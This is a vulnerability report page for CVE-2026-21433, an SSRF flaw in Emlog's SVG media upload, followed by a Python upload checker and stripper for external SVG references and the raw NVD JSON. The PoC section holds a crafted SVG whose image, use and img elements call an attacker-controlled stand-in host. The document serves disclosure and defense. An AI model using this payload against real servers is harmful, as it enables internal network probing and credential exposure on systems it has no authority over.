Security Vulnerability Report
CVE-2026-21433 CVSS 7.7 HIGH

CVE-2026-21433

Published: 2026-01-02 19:15:48
Last Modified: 2026-01-16 18:11:24

Description

Emlog is an open source website building system. Versions up to and including 2.5.19 are vulnerable to server-side Out-of-Band (OOB) requests / SSRF via uploaded SVG files. An attacker can upload a crafted SVG to http[:]//emblog/admin/media[.]php which contains external resource references. When the server processes/renders the SVG (thumbnailing, preview, or sanitization), it issues an HTTP request to the attacker-controlled host. Impact: server-side SSRF/OOB leading to internal network probing and potential metadata/credential exposure. As of time of publication, no known patched versions are available.

CVSS Details

CVSS Score
7.7
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:emlog:emlog:*:*:*:*:pro:*:*:* - VULNERABLE
Emlog <= 2.5.19

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
xml
<?xml version="1.0" encoding="UTF-8"?>
<!-- CVE-2026-21433 PoC: Malicious SVG for SSRF -->
<!-- Upload this SVG file via /admin/media.php -->
<svg xmlns="http://www.w3.org/2000/svg" width="500" height="500">
  <!-- External resource reference for SSRF -->
  <image href="http://attacker-controlled-server.com/collect" width="100" height="100"/>
  <!-- Alternative: use element with external reference -->
  <use href="http://attacker-controlled-server.com/internal-probe"/>
  <!-- Trigger request during SVG parsing -->
  <foreignObject width="1" height="1">
    <img xmlns="http://www.w3.org/1999/xhtml" src="http://attacker-controlled-server.com/leak"/>
  </foreignObject>
</svg>
<!-- Server-side request will be made to attacker server when SVG is processed -->
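The description says the request fires when the server processes the uploaded SVG, and the PoC shows the three carriers it relies on (an `<image href>`, a `<use href>`, and an XHTML `<img src>` inside `<foreignObject>`). The following is an added example and is not Emlog's code or part of the advisory: an upload-time checker that lists every reference a renderer would fetch from an SVG, plus a stripper that removes them, exercised on a constructed sample mirroring the PoC. The hostnames (`oob.example.test`), the size cap, and the element blocklist are assumptions; CSS `url(...)` references, which the PoC does not use, are covered as well because thumbnailers resolve them the same way.

```python
import re
import xml.etree.ElementTree as ET

SVG_NS = "http://www.w3.org/2000/svg"
XLINK_NS = "http://www.w3.org/1999/xlink"
ET.register_namespace("", SVG_NS)        # serialize <svg> without an ns0: prefix
ET.register_namespace("xlink", XLINK_NS)

# Attributes that make a renderer fetch something: SVG 2 href, SVG 1.1 xlink:href,
# and the XHTML src/data that can appear inside <foreignObject>.
REF_ATTRS = {"href", f"{{{XLINK_NS}}}href", "src", "data"}
# Elements an uploaded image never needs; common SSRF and XSS carriers (assumed policy).
BLOCKED_TAGS = {f"{{{SVG_NS}}}foreignObject", f"{{{SVG_NS}}}script"}
# CSS url(...) whose target is not a same-document fragment, e.g. fill:url(http://...)
CSS_URL_RE = re.compile(r"url\(\s*['\"]?\s*(?!#)", re.IGNORECASE)
MAX_BYTES = 2 * 1024 * 1024  # upload size cap (assumed policy)


def _local(name: str) -> str:
    """Strip the {namespace} prefix ElementTree puts on tags and attributes."""
    return name.rsplit("}", 1)[-1]


def _is_fetchable(ref: str) -> bool:
    """Anything that is not empty, an in-document fragment, or inline data: triggers a fetch."""
    ref = ref.strip()
    if not ref:
        return False
    return not (ref.startswith("#") or ref.lower().startswith("data:"))


def find_external_refs(svg: bytes) -> list[tuple[str, str, str]]:
    """Return (element, attribute, value) for every reference a renderer would resolve."""
    if len(svg) > MAX_BYTES:
        raise ValueError("SVG exceeds size limit")
    # NOTE: stdlib expat does not fetch external DTDs, but it does expand internal
    # entities; in production parse untrusted XML with defusedxml.
    root = ET.fromstring(svg)
    findings = []
    for el in root.iter():
        tag = _local(el.tag)
        if el.tag in BLOCKED_TAGS:
            findings.append((tag, "", "disallowed element"))
        for attr, value in el.attrib.items():
            if attr in REF_ATTRS and _is_fetchable(value):
                findings.append((tag, _local(attr), value))
            elif attr == "style" and CSS_URL_RE.search(value):
                findings.append((tag, "style", value))
        if tag == "style" and el.text and CSS_URL_RE.search(el.text):
            findings.append((tag, "", el.text.strip()))
    return findings


def strip_external_refs(svg: bytes) -> bytes:
    """Return the SVG with blocked elements and fetchable references removed."""
    root = ET.fromstring(svg)
    parent_of = {child: parent for parent in root.iter() for child in parent}
    for el in list(root.iter()):           # snapshot: the tree is modified below
        bad_style = _local(el.tag) == "style" and el.text and CSS_URL_RE.search(el.text)
        if el.tag in BLOCKED_TAGS or bad_style:
            if el in parent_of:
                parent_of[el].remove(el)   # drops the element and everything under it
            continue
        for attr in list(el.attrib):
            value = el.attrib[attr]
            if (attr in REF_ATTRS and _is_fetchable(value)) or (
                attr == "style" and CSS_URL_RE.search(value)
            ):
                del el.attrib[attr]
    return ET.tostring(root, encoding="utf-8", xml_declaration=True)


# Constructed sample mirroring the PoC above (XML declaration first so a strict
# parser accepts it); hostnames are placeholders, not real infrastructure.
POC_SVG = b"""<?xml version="1.0" encoding="UTF-8"?>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="500" height="500">
  <image href="http://oob.example.test/collect" width="100" height="100"/>
  <use xlink:href="http://oob.example.test/internal-probe"/>
  <rect width="10" height="10" style="fill:url(http://oob.example.test/css)"/>
  <foreignObject width="1" height="1">
    <img xmlns="http://www.w3.org/1999/xhtml" src="http://oob.example.test/leak"/>
  </foreignObject>
</svg>"""

# Constructed benign sample: only same-document references, which must pass.
BENIGN_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" width="10" height="10">
  <defs><linearGradient id="g"/></defs>
  <rect width="10" height="10" fill="url(#g)"/>
  <use href="#g"/>
</svg>"""

if __name__ == "__main__":
    for elem, attr, value in find_external_refs(POC_SVG):
        print(f"reject: <{elem}> {attr or '(element)'} -> {value}")
    print(strip_external_refs(POC_SVG).decode())
```

On the PoC sample the checker reports five findings (the image, use, style, foreignObject and img entries) and nothing on the benign file; the stripped output passes the checker again. The point that matters for this CVE is ordering: the check has to run on the raw upload before any thumbnailing, preview or sanitizer that itself renders the file, because by the time a renderer has resolved the reference the out-of-band request has already left the server. For an image-upload endpoint the simpler and safer policy is to reject a file with any finding rather than to sanitize and keep it.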

References

https://github.com/emlog/emlog/security/advisories/GHSA-6rwr-c8hc-mjj4 (Exploit, Vendor Advisory)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-21433",
    "sourceIdentifier": "[email protected]",
    "published": "2026-01-02T19:15:48.187",
    "lastModified": "2026-01-16T18:11:24.493",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Emlog is an open source website building system. Versions up to and including 2.5.19 are vulnerable to server-side Out-of-Band (OOB) requests / SSRF via uploaded SVG files. An attacker can upload a crafted SVG to http[:]//emblog/admin/media[.]php which contains external resource references. When the server processes/renders the SVG (thumbnailing, preview, or sanitization), it issues an HTTP request to the attacker-controlled host. Impact: server-side SSRF/OOB leading to internal network probing and potential metadata/credential exposure. As of time of publication, no known patched versions are available."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N",
            "baseScore": 7.7,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "CHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.1,
          "impactScore": 4.0
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-918"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:emlog:emlog:*:*:*:*:pro:*:*:*",
                "versionEndIncluding": "2.5.19",
                "matchCriteriaId": "72E4E5DE-A4A2-4326-B8EE-71690D75F7AE"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/emlog/emlog/security/advisories/GHSA-6rwr-c8hc-mjj4",
        "source": "[email protected]",
        "tags": [
          "Exploit",
          "Vendor Advisory"
        ]
      }
    ]
  }
}